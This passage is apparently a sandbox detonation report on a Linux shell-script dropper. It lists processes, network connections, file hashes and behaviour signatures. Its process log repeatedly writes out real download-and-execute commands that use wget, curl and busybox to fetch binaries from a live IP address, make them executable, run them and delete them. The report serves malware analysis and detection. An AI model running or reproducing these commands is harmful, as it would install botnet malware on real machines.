[/bin/busybox wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/bin/chmod

[chmod 777 zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz

[./zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/bin/rm

[rm zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/usr/bin/wget

[wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/bin/chmod

[chmod 777 OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb

[./OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/bin/rm

[rm OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
N/A 224.0.0.251:5353 udp
BG 87.120.126.196:80 87.120.126.196 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.129.91:443 tcp
US 151.101.129.91:443 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
GB 89.187.167.39:443 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 89.187.167.38:443 1527653184.rsc.cdn77.org tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-21 01:30

Reported

2024-10-21 01:32

Platform

debian9-armhf-20240418-en

Max time kernel

34s

Max time network

35s

Command Line

[/tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA N/A
N/A /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz N/A
N/A /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb N/A
N/A /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S N/A
N/A /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly N/A
N/A /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m N/A
N/A /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp N/A
N/A /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ N/A
N/A /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq N/A
N/A /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N N/A
N/A /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj N/A
N/A /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp N/A
N/A /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 N/A
N/A /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT N/A
N/A /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly N/A
N/A /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m N/A
N/A /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 N/A
N/A /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT N/A
N/A /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp N/A
N/A /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ N/A
N/A /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq N/A
N/A /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N N/A
N/A /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj N/A
N/A /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp N/A
N/A /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ /usr/bin/curl N/A
File opened for modification /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp /usr/bin/curl N/A
File opened for modification /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA /usr/bin/curl N/A
File opened for modification /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly /usr/bin/curl N/A
File opened for modification /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ /usr/bin/curl N/A
File opened for modification /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly /usr/bin/curl N/A
File opened for modification /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj /usr/bin/curl N/A
File opened for modification /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S /usr/bin/curl N/A
File opened for modification /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N /usr/bin/curl N/A
File opened for modification /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT /usr/bin/curl N/A
File opened for modification /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m /usr/bin/curl N/A
File opened for modification /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 /usr/bin/curl N/A
File opened for modification /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp /usr/bin/curl N/A
File opened for modification /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N /usr/bin/curl N/A
File opened for modification /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz /usr/bin/curl N/A
File opened for modification /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m /usr/bin/curl N/A
File opened for modification /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp /usr/bin/curl N/A
File opened for modification /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq /usr/bin/curl N/A
File opened for modification /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 /usr/bin/curl N/A
File opened for modification /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT /usr/bin/curl N/A
File opened for modification /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq /usr/bin/curl N/A
File opened for modification /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb /usr/bin/curl N/A
File opened for modification /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S /usr/bin/curl N/A
File opened for modification /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj /usr/bin/curl N/A
File opened for modification /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp /usr/bin/curl N/A

Processes

/tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh

[/tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/bin/chmod

[chmod 777 RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA

[./RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/bin/rm

[rm RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA]

/usr/bin/wget

[wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/bin/chmod

[chmod 777 zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz

[./zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/bin/rm

[rm zunJs37CUY2h9nRreComkTdOAsAvGJSgPz]

/usr/bin/wget

[wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/bin/chmod

[chmod 777 OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb

[./OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/bin/rm

[rm OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb]

/usr/bin/wget

[wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/bin/chmod

[chmod 777 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S

[./Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/bin/rm

[rm Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S]

/usr/bin/wget

[wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/bin/chmod

[chmod 777 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly

[./pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/bin/rm

[rm pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly]

/usr/bin/wget

[wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/bin/chmod

[chmod 777 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m

[./2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/bin/rm

[rm 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m]

/usr/bin/wget

[wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/bin/chmod

[chmod 777 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp

[./Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/bin/rm

[rm Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp]

/usr/bin/wget

[wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/bin/chmod

[chmod 777 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ

[./I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/bin/rm

[rm I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ]

/usr/bin/wget

[wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/bin/chmod

[chmod 777 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq

[./zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/bin/rm

[rm zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq]

/usr/bin/wget

[wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/bin/chmod

[chmod 777 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N

[./h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/bin/rm

[rm h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N]

/usr/bin/wget

[wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/bin/chmod

[chmod 777 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj

[./tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/bin/rm

[rm tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj]

/usr/bin/wget

[wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/bin/chmod

[chmod 777 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp

[./nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/bin/rm

[rm nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp]

/usr/bin/wget

[wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/bin/chmod

[chmod 777 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67

[./271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/bin/rm

[rm 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67]

/usr/bin/wget

[wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/bin/chmod

[chmod 777 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT

[./xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/bin/rm

[rm xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT]

/usr/bin/wget

